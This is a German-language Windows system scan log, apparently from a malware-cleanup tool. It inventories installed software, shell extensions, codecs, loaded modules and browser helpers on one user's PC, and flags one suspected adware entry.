Microsoft OneDrive (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\OneDriveSetup.exe) (Version: 19.103.0527.0003 - Microsoft Corporation)
Microsoft SQL Server*2014 Express LocalDB  (HKLM\...\{CA191120-4CB1-4E3D-89B8-79FDB9017A2E}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft Teams (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Teams) (Version: 1.3.00.24755 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{143E35D3-F0A4-4E90-96C9-B1B72F11343A}) (Version: 2.70.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.23.27820 (HKLM-x32\...\{45231ab4-69fd-486a-859d-7a59fcd11013}) (Version: 14.23.27820.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
MozBackup 1.5.1 (HKLM-x32\...\MozBackup) (Version:  - Pavel Cvrcek)
Mozilla Firefox 83.0 (x64 de) (HKLM\...\Mozilla Firefox 83.0 (x64 de)) (Version: 83.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 57.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 83.0.0.7621 - Mozilla)
Mozilla Thunderbird 52.5.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 52.5.0 (x86 de)) (Version: 52.5.0 - Mozilla)
Mozilla Thunderbird 78.5.0 (x86 de) (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Mozilla Thunderbird 78.5.0 (x86 de)) (Version: 78.5.0 - Mozilla)
MyPhoneExplorer (HKLM-x32\...\MPE) (Version: 1.8.11 - F.J. Wechselberger)
News File Grabber 4.6.0.4 (HKLM-x32\...\News File Grabber_is1) (Version:  - RSBR-Software)
NosTale de-DE (HKLM-x32\...\{dd4e22d6-00d1-44b9-8126-d8b40e0cd7c9.de-DE}) (Version:  - Gameforge)
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 7.9 - Notepad++ Team)
NVIDIA 3D Vision Controller-Treiber 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA Grafiktreiber 432.00 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 432.00 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.38.16 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.38.16 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.18.0907 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.18.0907 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 24.0.3 - OBS Project)
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.11727.20244 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.13328.20340 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.13328.20340 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.11727.20244 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.13328.20340 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0407-1000-0000000FF1CE}) (Version: 16.0.11727.20244 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.13328.20340 - Microsoft Corporation) Hidden
OpenAudible 2.3.5 (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\7008-5171-7013-3819) (Version: 2.3.5 - openaudible.org)
Origin (HKLM-x32\...\Origin) (Version: 10.5.89.45622 - Electronic Arts, Inc.)
PDF24 Creator 9.2.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: 9.2.0 - PDF24.org)
Phase 5 HTML-Editor (HKLM-x32\...\{20B1B020-DEAE-48D1-9960-D4C3185D758B}) (Version: 5.6.2.3 - Systemberatung Schommer)
Plex Media Server (HKLM-x32\...\{1b8e71fc-44b8-4550-9376-72db5f2746ce}) (Version: 1.11.3.4803 - Plex, Inc.)
Plex Media Server (HKLM-x32\...\{617D6B5B-FCAE-43F5-9B09-73798070833E}) (Version: 1.11.3803 - Plex, Inc.) Hidden
Pokémon Trading Card Game Online (HKLM-x32\...\{C239A609-2496-402F-A119-4BF92B43D717}) (Version: 2.49.0 - The Pokémon Company International)
ProgTV 2 (x64) x64 (HKLM\...\ProgTV) (Version: 2.x - Prog)
QuickPar 0.9 (HKLM-x32\...\QuickPar) (Version: 0.9 - Peter B. Clements)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7910 - Realtek Semiconductor Corp.)
RecordPad Audio-Recorder (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Recordpad) (Version: 7.05 - NCH Software)
RV-Print 2.0 (HKLM-x32\...\{38DC365A-06D8-494C-8F29-04B3A6652ACE}) (Version: 2.00.684.0 - Resch-Verlag)
SABnzbd 2.3.7 (HKLM-x32\...\SABnzbd) (Version: 2.3.7 - The SABnzbd Team)
Scratch 2 Offline Editor (HKLM-x32\...\{6E988774-5309-E02E-7EA8-F19CB65C2063}) (Version: 255 - Massachusetts Institute of Technology) Hidden
Scratch 2 Offline Editor (HKLM-x32\...\edu.media.mit.Scratch2Editor) (Version: 461 - Massachusetts Institute of Technology)
Settlers 7 (HKLM-x32\...\Uplay Install 8) (Version:  - Ubisoft)
Shotcut (HKLM-x32\...\Shotcut) (Version: 20.02.17 - Meltytech, LLC)
SpeedCommander 16 (x64) (HKLM\...\SpeedCommander 16 (x64)) (Version: 16.20.8300 - SWE Sven Ritter)
SpeedCommander 17 (x64) (HKLM\...\SpeedCommander 17 (x64)) (Version: 17.30.8900 - SWE Sven Ritter)
StarMoney (HKLM-x32\...\{54552154-C54F-4F81-99FE-84567C2BCB56}) (Version: 4.0.8.25 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{5C1209B1-FA1D-40D3-BA13-4ED9F0F31002}) (Version: 6.0.1.83 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{99D7711E-74BE-4920-8088-CB785D4C406F}) (Version: 5.0.0.226 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{B535DF59-3B5C-40B6-934B-BAF2987CA9A0}) (Version: 7.0.0.203 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{B98B1721-994D-4B47-B097-ADD88E57A298}) (Version: 4.0.8.25 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{BA8CA518-A9B4-485C-AEE0-22E3F0E0E5F6}) (Version: 5.0.0.226 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{E771D898-9A06-4EEF-B84D-B2DB75080F3E}) (Version: 6.0.1.83 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{F8726CFE-2A08-4B2A-9E10-645F38D5A04A}) (Version: 7.0.0.203 - StarFinanz) Hidden
StarMoney 11  (HKLM-x32\...\{99DED8BC-9674-43AA-AE56-8E52C15769B1}) (Version: 11 - Star Finanz GmbH)
StarMoney 12 Basic  (HKLM-x32\...\{80A5295E-DD70-4A94-86A3-8F63AE01F0E5}) (Version: 12 - Star Finanz GmbH)
Startfenster-Replace (HKLM-x32\...\Startfenster-Replace.de) (Version: 1.0.3 - Startfenster-Replace) <==== ACHTUNG
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
StExBar (HKLM-x32\...\{A5927ACA-AE5E-44E6-97BA-3E512CFF3963}) (Version: 1.10.0 - Stefans Tools)
Stopping Plex (HKLM-x32\...\{E70B9551-B5D4-41BC-AB7C-EE44025F77DC}) (Version: 1.11.3803 - Plex, Inc.) Hidden
Synology Assistant (remove only) (HKLM-x32\...\Synology Assistant) (Version: 6.1-15163 - Synology)
Synology Photo Station Uploader (remove only) (HKLM-x32\...\Photo Station Uploader) (Version: 1.4.3.087 - Synology)
T16 Wired Gaming Mouse (HKLM-x32\...\{444BE55C-4B14-4DB8-9922-6846C1437677}_is1) (Version: 1.0.3 - )
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.2.1 - TeamSpeak Systems GmbH)
TempoPerfect Metronome Software (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\TempoPerfect) (Version: 4.08 - NCH Software)
Titanfall™ 2 (HKLM-x32\...\{4BD80373-FEE7-45B6-8249-6E8E98717405}) (Version: 1.0.1.3 - Electronic Arts, Inc.)
Tone Generator Tongenerator-Software (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\ToneGen) (Version: 3.05 - NCH Software)
twengoo (HKLM-x32\...\{2ADA8DBD-2833-4235-A07E-0CD653A992FF}) (Version: 1.0.0.0 - Twengoo)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{16AD6161-2E47-4BF1-AA77-0946EFE93E08}) (Version: 2.61.0.0 - Microsoft Corporation)
Updater (HKLM-x32\...\Updater) (Version: 1.0 - Updater)
Uplay (HKLM-x32\...\Uplay) (Version: 73.0 - Ubisoft)
VdhCoApp 1.2.4 (HKLM\...\weh-iss-net.downloadhelper.coapp_is1) (Version:  - DownloadHelper)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.11 - VideoLAN)
VSDC Free Video Editor Version 6.4.2.102 (HKLM\...\VSDC Free Video Editor_is1) (Version: 6.4.2.102 - Flash-Integro LLC)
Wahlhelfer2018 (HKLM-x32\...\{AFC040C0-4AB0-11DE-5F90-00A66CB96952}) (Version: Version 1.34 - W.A.F. Institut AG)
WavePad Audio-Editor (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\WavePad) (Version: 8.08 - NCH Software)
Web Companion (HKLM-x32\...\{939d37af-8908-4904-bf96-c2b98f5730ae}) (Version: 4.10.2225.4082 - Lavasoft)
WestwoodChat (HKLM-x32\...\{7CAE6A67-AF7B-4A6A-8705-8AFACA45BB60}) (Version: 1.0.0.0 - WestwoodChat)
WestwoodOnline (HKLM-x32\...\{BBCD6D56-8A26-4DDE-9482-DBC9C7B7341D}) (Version: 1.0.0.0 - WestwoodOnline)
Windows 10-Update-Assistent (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22452 - Microsoft Corporation)
Windows 7 Games for Windows 10 and 8 (HKLM\...\Win7Games) (Version: 2.0 - hxxp://winaero.com)
Windows-Treiberpaket - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows-Treiberpaket - Silicon Labs Software (DSI_SiUSBXp_3_1) USB  (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
WinRAR 5.50 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)
Wondershare Filmora9(Build 9.3.6) (HKLM\...\Wondershare Filmora9_is1) (Version:  - Wondershare Software)
Wondershare Helper Compact 2.6.0 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.6.0 - Wondershare)
World in Conflict (HKLM-x32\...\Uplay Install 90) (Version:  - Ubisoft)

Packages:
=========
Audible - Hörbuch und Hörspiel App -> C:\Program Files\WindowsApps\AudibleInc.AudibleforWindowsPhone_10.5.66.0_x64__xns73kv1ymhp2 [2020-11-25] (Audible Inc)
Fotos-Add-On -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2017.39121.36610.0_x64__8wekyb3d8bbwe [2020-11-01] (Microsoft Corporation)
HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_121.1.193.0_x64__v10z8vjag6ke6 [2020-11-05] (HP Inc.)
Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2020-11-01] (Microsoft Corporation)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-12] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-12] (Microsoft Corporation) [MS Ad]
Microsoft Mahjong -> C:\Program Files\WindowsApps\Microsoft.MicrosoftMahjong_4.0.11030.0_x64__8wekyb3d8bbwe [2020-11-15] (Microsoft Studios) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.10142.0_x64__8wekyb3d8bbwe [2020-10-21] (Microsoft Studios) [MS Ad]

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-3451750051-380284315-2914928687-1002_Classes\CLSID\{19A6E644-14E6-4A60-B8D7-DD20610A871D}\InprocServer32 -> C:\Users\Tom\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20240.5\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3451750051-380284315-2914928687-1002_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\Tom\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20240.5\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [Datei ist nicht signiert]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files\Notepad++\NppShell_06.dll [2020-09-24] (Notepad++ -> )
ContextMenuHandlers1-x32: [MyPhoneExplorer] -> {A372C6DF-7A85-41B1-B3B0-D1E24073DCBF} => d:\Program Files (x86)\MyPhoneExplorer\DLL\ShellMgr.dll [2010-03-30] (F.J. Wechselberger) [Datei ist nicht signiert]
ContextMenuHandlers1-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => D:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => D:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-12-02] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [Datei ist nicht signiert]
ContextMenuHandlers4-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Keine Datei
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} =>  -> Keine Datei
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2019-10-02] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers5-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [Datei ist nicht signiert]
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-12-02] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6-x32: [StExBar] -> {367D8B32-F9FD-474b-8E65-9E521F35DE99} => C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => D:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => D:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Drivers32: [VIDC.X264] => C:\Windows\system32\x264vfw64.dll [3799552 2017-07-30] (x264vfw project) [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.LAGS] => C:\Windows\system32\lagarith.dll [148992 2011-12-07] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.XVID] => C:\Windows\system32\xvidvfw.dll [311296 2018-01-28] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.ac3acm] => C:\Windows\system32\AC3ACM.acm [180736 2012-07-21] (fccHandler) [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.voxacm160] => C:\Windows\system32\vct3216.acm [82944 2003-05-21] (Voxware, Inc.) [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.scg726] => C:\Windows\system32\scg726.acm [13239 2000-03-14] (SHARP Corporation) [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.alf2cd] => C:\Windows\system32\alf2cd.acm [38912 2003-05-21] (NCT Company) [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.lame] => C:\Windows\system32\lame.ax [245760 2005-08-01] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.dvsd] => C:\Windows\system32\mcdvd_32.dll [261632 2003-05-21] (MainConcept) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.mpg4] => C:\Windows\system32\mpg4c32.dll [413760 2002-08-19] (Microsoft Corporation) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.mp42] => C:\Windows\system32\mpg4c32.dll [413760 2002-08-19] (Microsoft Corporation) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.mp43] => C:\Windows\system32\mpg4c32.dll [413760 2002-08-19] (Microsoft Corporation) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.DIVX] => C:\Windows\system32\DivX.dll [638976 2003-05-22] (DivXNetworks, Inc.) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.VP60] => C:\Windows\system32\vp6vfw.dll [438272 2004-12-10] (On2.com) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.VP61] => C:\Windows\system32\vp6vfw.dll [438272 2004-12-10] (On2.com) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.VP62] => C:\Windows\system32\vp6vfw.dll [438272 2004-12-10] (On2.com) [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.X264] => C:\Windows\SysWOW64\x264vfw.dll [3850240 2017-07-30] (x264vfw project) [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.LAGS] => C:\Windows\SysWOW64\lagarith.dll [216064 2011-12-07] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.XVID] => C:\Windows\SysWOW64\xvidvfw.dll [284672 2018-01-28] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.ac3acm] => C:\Windows\SysWOW64\ac3acm.acm [122880 2012-07-21] (fccHandler) [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.FFDS] => C:\Windows\SysWOW64\ff_vfw.dll [112128 2015-10-24] () [Datei ist nicht signiert]

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

Shortcut: C:\Users\Tom\Favorites\NCH Software Download Site.lnk -> hxxp://www.nch.com.au/index.htm
Shortcut: C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Network Shortcuts\My Web Sites on MSN\target.lnk -> hxxp://www.msnusers.co

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2019-06-17 20:35 - 2013-01-15 16:06 - 000061952 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Drakonia Configurator\HidDevice.dll
2017-12-10 20:25 - 2011-08-23 13:04 - 000057344 _____ () [Datei ist nicht signiert] d:\WinTV8\TVServer\libhdhomerun.dll
2017-12-10 20:25 - 2015-11-24 20:59 - 000134656 _____ (Hauppauge Computer Works) [Datei ist nicht signiert] D:\WinTV8\WinTV8\hcwtsfilter.ax
2017-12-10 20:25 - 2015-11-24 20:59 - 000113152 _____ (Hauppauge Computer Works) [Datei ist nicht signiert] D:\WinTV8\WinTV8\HCWTSWriter.ax
2017-12-10 20:25 - 2016-04-26 12:29 - 000332288 _____ (Hauppauge Computer Works, Inc.) [Datei ist nicht signiert] D:\WinTV8\WinTV8\PsiParser.ax
2019-06-17 20:35 - 2011-11-22 13:22 - 000143360 _____ (Holtek) [Datei ist nicht signiert] C:\Program Files (x86)\Drakonia Configurator\HIDApi.dll
2019-08-31 09:32 - 2020-06-24 09:32 - 001282048 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\LIBEAY32.dll
2019-08-31 09:32 - 2020-06-24 09:32 - 000279040 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\ssleay32.dll
2020-03-24 07:35 - 2020-06-24 09:32 - 001611264 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\platforms\qwindows.dll
2020-12-02 20:07 - 2020-06-24 09:32 - 005487104 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Core.dll
2020-12-02 20:07 - 2020-06-24 09:32 - 005841920 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Gui.dll
2020-12-02 20:07 - 2020-06-24 09:32 - 001179136 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Network.dll
2020-12-02 20:07 - 2020-06-24 09:32 - 000146432 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5WebSockets.dll
2020-12-02 20:07 - 2020-06-24 09:32 - 005089792 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Widgets.dll
2020-12-02 20:07 - 2020-06-24 09:32 - 000184832 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Xml.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\Users\Public\AppData:CSM [468]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [482]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2020-09-18] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre-10.0.2\bin\ssv.dll => Keine Datei
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre-10.0.2\bin\jp2ssv.dll [2020-06-27] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2020-09-18] (Microsoft Corporation -> Microsoft Corporation)
